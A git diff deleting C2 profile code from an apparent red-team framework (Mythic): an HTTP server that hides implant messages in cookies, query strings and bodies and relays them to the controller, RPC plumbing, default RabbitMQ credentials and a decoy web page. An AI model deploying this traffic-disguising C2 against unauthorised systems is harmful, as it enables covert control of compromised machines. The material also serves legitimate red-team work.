- - -async def r_random_alpha(*args): - # called with random_mixed(value, 10), always appends - # return the string going from 0 to -10 (or ten from the end) - return args[0][: -1 * args[1]] - - -async def choose_random(*args): - # called with choose_random(value, opt1, opt2, opt3...) - choice = random.choice(args[1:]) - return args[0] + choice - - -async def r_choose_random(*args): - # called with choose_random(value, opt1, opt2, opt3...) 
- for e in args[1:]: - if e in args[0]: - return args[0].replace(e, "", 1) - - -async def get_value(value, transforms): - # given an obfuscated value, apply transforms to get back the value we need - # await print_flush(transforms) - for step in transforms[::-1]: - value = await globals()["r_" + step['function']](value, *step['parameters']) - return value - - -async def create_value(value, transforms): - for step in transforms: - # await print_flush("in create_value: value: {}\n".format(value)) - value = await globals()[step['function']](value, *step['parameters']) - return value - - -async def create_response(request, data, status=200, method="POST"): - try: - if config[request.app.name]['debug']: - await print_flush("calling create_value for data: {}\nwith transforms: {}\n".format(data, config[request.app.name][method]['ServerBody'])) - data = await create_value(data, config[request.app.name][method]['ServerBody']) - - headers = config[request.app.name][method]['ServerHeaders'] - - cookies = config[request.app.name][method]['ServerCookies'] - if config[request.app.name]['debug']: - await print_flush("response of: {}".format(data)) - await print_flush("response data: {}\n".format(data)) - await print_flush("response headers: {}\n".format(headers)) - await print_flush("response_cookies: {}\n".format(cookies)) - if isinstance(data, str): - data = data.encode() - response = raw(data, status=status, headers=headers) - for key in cookies.items(): - response.cookies[key] = cookies[key] - return response - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("error in create_response: {}".format(str(e))) - return html("Error: Requested URL {} not found\n".format(request.url), status=404) - - -async def no_match(request, exception): - global config - if config[request.app.name]['debug']: - await print_flush("hit a 'no_match' case") - if config[request.app.name]['no_match']['action'] == "": - return await create_response(request, data="Error: Requested URL {} not found".format(request.url), status=404) - elif config[request.app.name]['no_match']['action'] == 'redirect': - return redirect(config[request.app.name]['no_match']['redirect']) - elif config[request.app.name]['no_match']['action'] == 'proxy_get': - resp = requests.get(config[request.app.name]['no_match']['proxy_get']['url'], verify=False) - return await create_response(request, data=resp.content, status=config[request.app.name]['no_match']['proxy_get']['status']) - elif config[request.app.name]['no_match']['action'] == 'proxy_post': - resp = requests.post(config[request.app.name]['no_match']['proxy_post']['url'], data=request.body, verify=False) - return await create_response(request, data=resp.content, status=config[request.app.name]['no_match']['proxy_post']['status']) - elif config[request.app.name]['no_match']['action'] == 'return_file': - content = open(config[request.app.name]['no_match']['return_file']['name'], 'r').read() - return await create_response(request, data=content, status=config[request.app.name]['no_match']['return_file']['status']) - - -async def print_flush(message): - print(message) - sys.stdout.flush() - - -async def get_base_values(request, method: str, mythic_endpoint: str, **kwargs): - value = None - transforms = None - try: - if config[request.app.name][method][mythic_endpoint]['location'] == 'URI': - value = kwargs["message"] - transforms = {} - elif config[request.app.name][method][mythic_endpoint]['location'] == 'QueryParameters': - value = 
request.args[config[request.app.name][method][mythic_endpoint]['value']['name']][0] - transforms = config[request.app.name][method][mythic_endpoint]['value']['transforms'] - elif config[request.app.name][method][mythic_endpoint]['location'] == 'Cookies': - value = request.cookies.get(config[request.app.name][method][mythic_endpoint]['value']['name']) - transforms = config[request.app.name][method][mythic_endpoint]['value']['transforms'] - elif config[request.app.name][method][mythic_endpoint]['location'] == 'Body': - value = request.body - transforms = config[request.app.name][method][mythic_endpoint]['value'] - else: - if config[request.app.name]['debug']: - await print_flush("{} failed to find required parameter".format(mythic_endpoint)) - return None, None - if config[request.app.name]['debug']: - await print_flush("Got value: {}\nGot transforms: {}\n".format(value, transforms)) - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("Failed to get a value: {}, {}".format(mythic_endpoint, str(e))) - return value, transforms - - -async def get_agent_message(request, **kwargs): - global config - try: - if config[request.app.name]['debug']: - await print_flush("get_agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers)) - # find the agent value and the transforms needed to get the real value out - message, transforms = await get_base_values(request, 'GET', request.uri_template, **kwargs) - if message is None: - # this means we failed to find our message - return await no_match(request, NotFound) - # given the message location and transforms, extract the actual value - message = await get_value(message, transforms) - if config[request.app.name]['debug']: - await print_flush("Forwarding along to: {}".format(config['mythic_address'])) - response = requests.post(config['mythic_address'], verify=False, data=message) - return await create_response(request, data=response.content, status=response.status_code, method="GET") - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("error in get_agent_message: {}".format(str(e))) - return await no_match(request, NotFound) - - -async def post_agent_message(request, **kwargs): - global config - try: - if config[request.app.name]['debug']: - await print_flush("post_agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers)) - message, agent_transforms = await get_base_values(request, 'POST', request.uri_template, **kwargs) - if message is None: - return await no_match(request, NotFound) - message = await get_value(message, agent_transforms) - if config[request.app.name]['debug']: - await print_flush("Forwarding along to: {}".format(config['mythic_address'])) - response = requests.post(config['mythic_address'], data=message, verify=False) - return await create_response(request, data=response.content, status=response.status_code, method="POST") - except Exception as e: - if config[request.app.name]['debug']: - await print_flush("error in post_agent_message: {}".format(str(e))) - return await no_match(request, NotFound) - - -if __name__ == "__main__": - config_file = open("config.json", 'rb') - main_config = json.loads(config_file.read().decode('utf-8')) - print("Opening config and starting instances...") - sys.stdout.flush() - # basic mapping of the general endpoints to the real endpoints - config['mythic_address'] = os.environ['MYTHIC_ADDRESS'] - # now look at the specific instances to start - for inst in 
main_config['instances']: - config[str(inst['port'])] = {'debug': inst['debug'], - 'no_match': inst['no_match'], - 'POST': { # these are server response configurations - 'ServerHeaders': inst['POST']['ServerHeaders'], - 'ServerCookies': inst['POST']['ServerCookies'], - 'ServerBody': inst['POST']['ServerBody'] - }, - "GET": { # these are server response configurations - 'ServerHeaders': inst['GET']['ServerHeaders'], - 'ServerCookies': inst['GET']['ServerCookies'], - 'ServerBody': inst['GET']['ServerBody'] - }} - if inst['debug']: - print("Debugging output is enabled. This might be a performance it, but gives more context") - else: - print("Debugging output is disabled") - sys.stdout.flush() - # now to create an app instance too handle responses - app = Sanic(str(inst['port'])) - app.config['REQUEST_MAX_SIZE'] = 1000000000 - app.config['REQUEST_TIMEOUT'] = 600 - app.config['RESPONSE_TIMEOUT'] = 600 - app.error_handler.add(Exception, no_match) - - # do a little extra processing here once so we don't have to do extra processing for each request - # for each endpoint need to track: - # 1. where the data is located (URI, query, cookie, body, header) - # 2. what needs to be done to access the value - # (access specific field, certain offset into data, decode first, etc) - # 3. what needs to be done to get the final value out (decode, remove extra data, etc) - - # an instance can have multiple URLs and schemes for each GET/POST, so loop through all of that - for g in inst['GET']['AgentMessage']: - app.add_route(get_agent_message, g['uri'], methods=['GET']) - config[str(inst['port'])]['GET'][g['uri']] = {} - # we need to find where the "message" parameter exists so we know where the data will be - for p in g['QueryParameters']: - if p['value'] == "message": - config[str(inst['port'])]['GET'][g['uri']]['location'] = "QueryParameters" - config[str(inst['port'])]['GET'][g['uri']]['value'] = p - for p in g['Cookies']: - if p['value'] == 'message': - config[str(inst['port'])]['GET'][g['uri']]['location'] = "Cookies" - config[str(inst['port'])]['GET'][g['uri']]['value'] = p - for p in g['urlFunctions']: - if p['name'] == '': - config[str(inst['port'])]['GET'][g['uri']]['location'] = "URI" - config[str(inst['port'])]['GET'][g['uri']]['value'] = p - if 'location' not in config[str(inst['port'])]['GET'][g['uri']]: - # if we haven't set it yet, data must be in the body - config[str(inst['port'])]['GET'][g['uri']]['location'] = "Body" - config[str(inst['port'])]['GET'][g['uri']]['value'] = g['Body'] - for g in inst['POST']['AgentMessage']: - app.add_route(post_agent_message, g['uri'], methods=['POST']) - config[str(inst['port'])]['POST'][g['uri']] = {} - # we need to find where the "message" parameter exists so we know where the data will be - for p in g['QueryParameters']: - if p['value'] == "message": - config[str(inst['port'])]['POST'][g['uri']]['location'] = "QueryParameters" - config[str(inst['port'])]['POST'][g['uri']]['value'] = p - for p in g['Cookies']: - if p['value'] == 'message': - config[str(inst['port'])]['POST'][g['uri']]['location'] = "Cookies" - config[str(inst['port'])]['POST'][g['uri']]['value'] = p - for p in g['urlFunctions']: - if p['name'] == '': - config[str(inst['port'])]['POST'][g['uri']]['location'] = "URI" - config[str(inst['port'])]['POST'][g['uri']]['value'] = p - if 'location' not in config[str(inst['port'])]['POST'][g['uri']]: - # if we haven't set it yet, data must be in the body - config[str(inst['port'])]['POST'][g['uri']]['location'] = "Body" - 
config[str(inst['port'])]['POST'][g['uri']]['value'] = g['Body'] - - keyfile = Path(inst['key_path']) - certfile = Path(inst['cert_path']) - if keyfile.is_file() and certfile.is_file(): - context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH) - context.load_cert_chain(inst['cert_path'], keyfile=inst['key_path']) - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=False) - if inst['debug']: - print("using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - else: - if inst['debug']: - print("not using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=False) - task = asyncio.ensure_future(server) - - try: - loop = asyncio.get_event_loop() - def callback(fut): - try: - fetch_count = fut.result() - except OSError as e: - print("probably the port set is being used") - fut.get_loop().stop() - task.add_done_callback(callback) - loop.run_forever() - except: - loop.stop() \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/mythic/C2ProfileBase.py b/C2_Profiles/dynamicHTTP/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def 
to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/dynamicHTTP/mythic/MythicBaseRPC.py b/C2_Profiles/dynamicHTTP/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return 
RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/dynamicHTTP/mythic/MythicCallbackRPC.py b/C2_Profiles/dynamicHTTP/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/C2_Profiles/dynamicHTTP/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/dynamicHTTP/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index 6332e7fc2..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import 
MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/mythic/c2_functions/dynamicHTTP.py b/C2_Profiles/dynamicHTTP/mythic/c2_functions/dynamicHTTP.py deleted file mode 100644 index 084e80073..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/c2_functions/dynamicHTTP.py +++ /dev/null @@ -1,18 +0,0 @@ -from C2ProfileBase import * - - -class DynamicHTTP(C2Profile): - name = "dynamicHTTP" - description = "Manipulate HTTP(S) requests and responses" - author = "@its_a_feature_" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="AESPSK", description="Base64 of a 32B AES Key", default_value="" - ), - C2ProfileParameter( - name="raw_c2_config", description="Agent JSON Config", default_value="" - ), - ] diff --git a/C2_Profiles/dynamicHTTP/mythic/c2_service.sh b/C2_Profiles/dynamicHTTP/mythic/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/C2_Profiles/dynamicHTTP/mythic/mythic_service.py b/C2_Profiles/dynamicHTTP/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." 
+ pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - 
file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! 
" + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except 
Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/dynamicHTTP/mythic/rabbitmq_config.json b/C2_Profiles/dynamicHTTP/mythic/rabbitmq_config.json deleted file mode 100755 index 08581c01a..000000000 --- a/C2_Profiles/dynamicHTTP/mythic/rabbitmq_config.json +++ /dev/null @@ -1,8 +0,0 @@ -{ - "username": "mythic_user", - "password": "mythic_password", - "virtual_host": "mythic_vhost", - "host": "127.0.0.1", - "name": "hostname", - "container_files_path": "/Mythic/" -} \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/Dockerfile b/C2_Profiles/leviathan-websocket/Dockerfile deleted file mode 100755 index beabdbb2f..000000000 --- a/C2_Profiles/leviathan-websocket/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 diff --git a/C2_Profiles/leviathan-websocket/c2_code/config.json b/C2_Profiles/leviathan-websocket/c2_code/config.json deleted file mode 100755 index e61625ddd..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/config.json +++ /dev/null @@ -1,10 +0,0 @@ -{ - "bindaddress": "0.0.0.0:8081", - "usessl": false, - "sslkey":"", - "sslcert":"", - "websocketuri": "socket", - "defaultpage": "index.html", - "logfile": "server.log", - "debug": false -} diff --git a/C2_Profiles/leviathan-websocket/c2_code/index.html b/C2_Profiles/leviathan-websocket/c2_code/index.html deleted file mode 100755 index 49f0e897f..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/index.html +++ /dev/null @@ -1,9 +0,0 @@ - - - -Under Construction - - -
This page is under construction. Please come back soon!
